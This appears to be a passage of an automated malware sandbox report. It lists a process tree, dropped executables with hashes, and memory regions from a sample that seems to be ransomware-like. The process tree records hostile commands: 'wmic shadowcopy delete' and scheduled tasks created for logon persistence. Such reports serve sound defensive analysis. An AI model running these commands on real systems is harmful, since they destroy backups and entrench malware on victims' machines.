                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
                                                                                        "bot.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies system executable filetype association
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3044
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
                                                                                        "4363463463464363463463463.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5116
                                                                                        • C:\Windows\svchost.com
                                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe"
                                                                                          2⤵
                                                                                            PID:4324
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe
                                                                                              3⤵
                                                                                                PID:6708
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 884
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:6740
                                                                                            • C:\Windows\svchost.com
                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe"
                                                                                              2⤵
                                                                                                PID:5136
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\bot.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:6696
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DesktopShellAppStateContract\dllhost.exe'" /rl HIGHEST /f
                                                                                              1⤵
                                                                                              • Process spawned unexpected child process
                                                                                              • Creates scheduled task(s)
                                                                                              PID:6612
                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:6036
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              wmic shadowcopy delete
                                                                                              1⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5168
                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
                                                                                              1⤵
                                                                                                PID:3564
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6708 -ip 6708
                                                                                                1⤵
                                                                                                  PID:1964
                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                  1⤵
                                                                                                    PID:1464

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

                                                                                                    Filesize

                                                                                                    701KB

                                                                                                    MD5

                                                                                                    cb960c030f900b11e9025afea74f3c0c

                                                                                                    SHA1

                                                                                                    bbdcad9527c814a9e92cdc1ee27ae9db931eb527

                                                                                                    SHA256

                                                                                                    91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99

                                                                                                    SHA512

                                                                                                    9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

                                                                                                    Filesize

                                                                                                    10KB

                                                                                                    MD5

                                                                                                    2a94f3960c58c6e70826495f76d00b85

                                                                                                    SHA1

                                                                                                    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

                                                                                                    SHA256

                                                                                                    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

                                                                                                    SHA512

                                                                                                    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

                                                                                                    Filesize

                                                                                                    313KB

                                                                                                    MD5

                                                                                                    fe1bc60a95b2c2d77cd5d232296a7fa4

                                                                                                    SHA1

                                                                                                    c07dfdea8da2da5bad036e7c2f5d37582e1cf684

                                                                                                    SHA256

                                                                                                    b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

                                                                                                    SHA512

                                                                                                    266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

                                                                                                    Filesize

                                                                                                    1.4MB

                                                                                                    MD5

                                                                                                    63210f8f1dde6c40a7f3643ccf0ff313

                                                                                                    SHA1

                                                                                                    57edd72391d710d71bead504d44389d0462ccec9

                                                                                                    SHA256

                                                                                                    2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

                                                                                                    SHA512

                                                                                                    87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

                                                                                                    Filesize

                                                                                                    92KB

                                                                                                    MD5

                                                                                                    1106972c03e704a5e316310ba69cfb3c

                                                                                                    SHA1

                                                                                                    43236560be831aca4790d7985bd5a5f20c31d888

                                                                                                    SHA256

                                                                                                    4c4b36e24b611fb0438786721131d314a42700863ff2bb39000492eab5092f2f

                                                                                                    SHA512

                                                                                                    4a19194fe8cb17c9036f399366ca8ecb9218864f3cca9bd73d23ca5218107bff3cd9a028c0db33221c5dc490a57b7e01ce632cd19f1ad3aa81d8ae14ffe7d4d8

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

                                                                                                    Filesize

                                                                                                    3.4MB

                                                                                                    MD5

                                                                                                    84c82835a5d21bbcf75a61706d8ab549

                                                                                                    SHA1

                                                                                                    5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                    SHA256

                                                                                                    ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                    SHA512

                                                                                                    90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe

                                                                                                    Filesize

                                                                                                    660KB

                                                                                                    MD5

                                                                                                    d8337d7ca38eddace5472f7a274b3943

                                                                                                    SHA1

                                                                                                    273fc254a6051aaf13d74b6f426fd9f1a58dee19

                                                                                                    SHA256

                                                                                                    3ac6dde9c9dfcaed7066ea5af5121fd75a7c6c1ab9bb7bb4ca35784d50efa202

                                                                                                    SHA512

                                                                                                    c65082f8478a7dfae7c244e093f34b8cd67599ab20e39a7db3fc50b346039588772764a4f737ad71fff74655534d6c307338c36de6ca209c5ff8b41d0171f589

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe

                                                                                                    Filesize

                                                                                                    448KB

                                                                                                    MD5

                                                                                                    700a9938d0fcff91df12cbefe7435c88

                                                                                                    SHA1

                                                                                                    f1f661f00b19007a5355a982677761e5cf14a2c4

                                                                                                    SHA256

                                                                                                    946583a0803167de24c7c0d768fe49546108e43500a1c2c838e7e0560addc818

                                                                                                    SHA512

                                                                                                    7fa6b52d10bcfc56ac4a43eda11ae107347ba302cc5a29c446b2d4a3f93425db486ed24a496a8acd87d98d9cfb8cad6505eb0d8d5d509bc323427b6931c8fff8

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

                                                                                                    Filesize

                                                                                                    381KB

                                                                                                    MD5

                                                                                                    53b65ec2bc88c315eaebbe67dbc6f4d1

                                                                                                    SHA1

                                                                                                    01e59c8db013a63e48a07ecc6e3313d55a54c299

                                                                                                    SHA256

                                                                                                    b5c8a8783b45aac8f9c276e4ca00306e40824b80af930ce36b4fb05332b4bdc9

                                                                                                    SHA512

                                                                                                    d729ab611880a2bd128ae2abfcaeaa9f9f79a8e8feafba38dae84453c11bcea71631846eee5b7d961f1cbd03f31f6ff4f8a0283ba6e3f1bdc6c7c3ecc4842125

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

                                                                                                    Filesize

                                                                                                    742KB

                                                                                                    MD5

                                                                                                    a8b8b90c0cf26514a3882155f72d80bd

                                                                                                    SHA1

                                                                                                    75679e54563b5e5eacf6c926ac4ead1bcc19344f

                                                                                                    SHA256

                                                                                                    4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452

                                                                                                    SHA512

                                                                                                    88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

                                                                                                    Filesize

                                                                                                    37KB

                                                                                                    MD5

                                                                                                    35c2f97eea8819b1caebd23fee732d8f

                                                                                                    SHA1

                                                                                                    e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                    SHA256

                                                                                                    1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                    SHA512

                                                                                                    908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

                                                                                                    Filesize

                                                                                                    1.4MB

                                                                                                    MD5

                                                                                                    b1b49a97a1d8ffa0e79894d2c5c9d1ce

                                                                                                    SHA1

                                                                                                    4c683818039174029fb00735cbfcd609fbc638bd

                                                                                                    SHA256

                                                                                                    ba659cae33cd1fdf6f14820c9912558624cd0e75f79f5ad2be7b9db0a6e8480a

                                                                                                    SHA512

                                                                                                    75646bec8bb8c4e9afb7dab874f32a2e2fc1b63f5905b5936ac7c9a8825e0658a68100c1bbaccc45c22c1f6955da4c7ae41405e0561df2fd48898c645e821caa

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

                                                                                                    Filesize

                                                                                                    50B

                                                                                                    MD5

                                                                                                    6a83b03054f53cb002fdca262b76b102

                                                                                                    SHA1

                                                                                                    1bbafe19ae5bcdd4f3710f13d06332128a5d54f7

                                                                                                    SHA256

                                                                                                    7952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e

                                                                                                    SHA512

                                                                                                    fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae

                                                                                                  • C:\Windows\directx.sys

                                                                                                    Filesize

                                                                                                    60B

                                                                                                    MD5

                                                                                                    f295caaf061f9ab446a51e01805aefae

                                                                                                    SHA1

                                                                                                    b9a4b804f6a95e7a782d4c5c6c3396f9707fd738

                                                                                                    SHA256

                                                                                                    b59878c41d52be69d5c5a7faf6df19c039d6e5774a5181dced71c4bffd122c89

                                                                                                    SHA512

                                                                                                    06c0be233881572f04a6dce9ec159e8f0102c5d8033708f054649383e77a5b7aa878bc63d7cab7a507a8145dc13643668374814e5c8314bfdcb4e709039a509f

                                                                                                  • memory/764-76-0x0000000000400000-0x0000000000433000-memory.dmp

                                                                                                    Filesize

                                                                                                    204KB

                                                                                                  • memory/764-534-0x0000000000400000-0x0000000000433000-memory.dmp

                                                                                                    Filesize

                                                                                                    204KB

                                                                                                  • memory/764-72-0x0000000004E60000-0x0000000004E91000-memory.dmp

                                                                                                    Filesize

                                                                                                    196KB

                                                                                                  • memory/764-575-0x0000000000400000-0x0000000000433000-memory.dmp

                                                                                                    Filesize

                                                                                                    204KB

                                                                                                  • memory/764-6204-0x0000000000400000-0x0000000000433000-memory.dmp

                                                                                                    Filesize

                                                                                                    204KB

                                                                                                  • memory/1064-566-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                    Filesize

                                                                                                    188KB

                                                                                                  • memory/1064-1068-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                    Filesize

                                                                                                    188KB

                                                                                                  • memory/1304-570-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                    Filesize

                                                                                                    244KB

                                                                                                  • memory/1304-568-0x0000000000670000-0x000000000067F000-memory.dmp

                                                                                                    Filesize

                                                                                                    60KB

                                                                                                  • memory/1456-1555-0x00007FFC19E30000-0x00007FFC1A8F2000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                  • memory/1456-703-0x0000000000080000-0x0000000000114000-memory.dmp

                                                                                                    Filesize

                                                                                                    592KB

                                                                                                  • memory/1456-1069-0x0000000000970000-0x000000000097C000-memory.dmp

                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/1456-877-0x0000000000960000-0x000000000096C000-memory.dmp

                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/1456-2820-0x000000001AE70000-0x000000001AE80000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1456-838-0x0000000000940000-0x000000000094A000-memory.dmp

                                                                                                    Filesize

                                                                                                    40KB

                                                                                                  • memory/1456-781-0x0000000000930000-0x000000000093C000-memory.dmp

                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/1480-839-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1492-2468-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1492-1674-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/1492-2547-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1492-2513-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/1496-1254-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/1496-4393-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/1496-2729-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/1496-1067-0x0000000000F80000-0x0000000000F90000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1676-97-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1788-112-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                    Filesize

                                                                                                    816KB

                                                                                                  • memory/1788-2249-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                    Filesize

                                                                                                    816KB

                                                                                                  • memory/1952-571-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/1964-670-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1964-695-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-672-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-833-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-848-0x00007FFC3ADE0000-0x00007FFC3AE9D000-memory.dmp

                                                                                                    Filesize

                                                                                                    756KB

                                                                                                  • memory/1964-591-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1964-782-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-635-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-730-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-681-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1964-612-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/1964-628-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1964-598-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/1964-708-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/2292-2331-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.6MB

                                                                                                  • memory/2292-168-0x0000000002310000-0x0000000002311000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2292-4730-0x0000000002310000-0x0000000002311000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2304-4288-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/2456-586-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/2564-250-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-39-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-1972-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-174-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-36-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-189-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-195-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                  • memory/2564-34-0x0000000002350000-0x000000000241E000-memory.dmp

                                                                                                    Filesize

                                                                                                    824KB

                                                                                                  • memory/2696-4674-0x00000000020C0000-0x00000000020C1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2888-840-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.0MB

                                                                                                  • memory/3044-1755-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/4024-595-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                    Filesize

                                                                                                    864KB

                                                                                                  • memory/4024-85-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                    Filesize

                                                                                                    864KB

                                                                                                  • memory/4304-876-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/4368-171-0x00000000024C0000-0x00000000024C1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4368-2354-0x0000000000400000-0x0000000000705000-memory.dmp

                                                                                                    Filesize

                                                                                                    3.0MB

                                                                                                  • memory/4368-4779-0x00000000024C0000-0x00000000024C1000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4476-574-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                    Filesize

                                                                                                    88KB

                                                                                                  • memory/4476-2066-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                    Filesize

                                                                                                    88KB

                                                                                                  • memory/4492-2250-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/4528-633-0x00000000006E0000-0x000000000073E000-memory.dmp

                                                                                                    Filesize

                                                                                                    376KB

                                                                                                  • memory/4528-1070-0x00000000006E0000-0x000000000073E000-memory.dmp

                                                                                                    Filesize

                                                                                                    376KB

                                                                                                  • memory/4528-2514-0x00000000006E0000-0x000000000073E000-memory.dmp

                                                                                                    Filesize

                                                                                                    376KB

                                                                                                  • memory/4528-707-0x00000000006E0000-0x000000000073E000-memory.dmp

                                                                                                    Filesize

                                                                                                    376KB

                                                                                                  • memory/4792-163-0x0000000001610000-0x0000000001620000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4792-4387-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/4792-165-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/4792-173-0x0000000001610000-0x0000000001620000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4792-251-0x0000000001610000-0x0000000001620000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4792-3775-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/4792-4509-0x0000000001610000-0x0000000001620000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4792-125-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/5040-572-0x0000000000660000-0x000000000066F000-memory.dmp

                                                                                                    Filesize

                                                                                                    60KB

                                                                                                  • memory/5040-573-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                    Filesize

                                                                                                    184KB

                                                                                                  • memory/5116-553-0x0000000072CB0000-0x0000000073461000-memory.dmp

                                                                                                    Filesize

                                                                                                    7.7MB

                                                                                                  • memory/5116-93-0x0000000072CB0000-0x0000000073461000-memory.dmp

                                                                                                    Filesize

                                                                                                    7.7MB

                                                                                                  • memory/5116-95-0x0000000005210000-0x00000000052AC000-memory.dmp

                                                                                                    Filesize

                                                                                                    624KB

                                                                                                  • memory/5116-108-0x0000000005380000-0x0000000005390000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/5116-82-0x0000000000870000-0x0000000000878000-memory.dmp

                                                                                                    Filesize

                                                                                                    32KB

                                                                                                  • memory/5504-2065-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB

                                                                                                  • memory/5780-3694-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                    Filesize

                                                                                                    80KB

                                                                                                  • memory/5780-3800-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                    Filesize

                                                                                                    80KB

                                                                                                  • memory/6036-4772-0x0000000000400000-0x00000000005B6000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.7MB

                                                                                                  • memory/6036-4672-0x0000000000400000-0x00000000005B6000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.7MB

                                                                                                  • memory/6592-4671-0x0000000000FF0000-0x0000000001000000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/6592-4640-0x000000006F0B0000-0x000000006F661000-memory.dmp

                                                                                                    Filesize

                                                                                                    5.7MB

                                                                                                  • memory/6752-4141-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                    Filesize

                                                                                                    108KB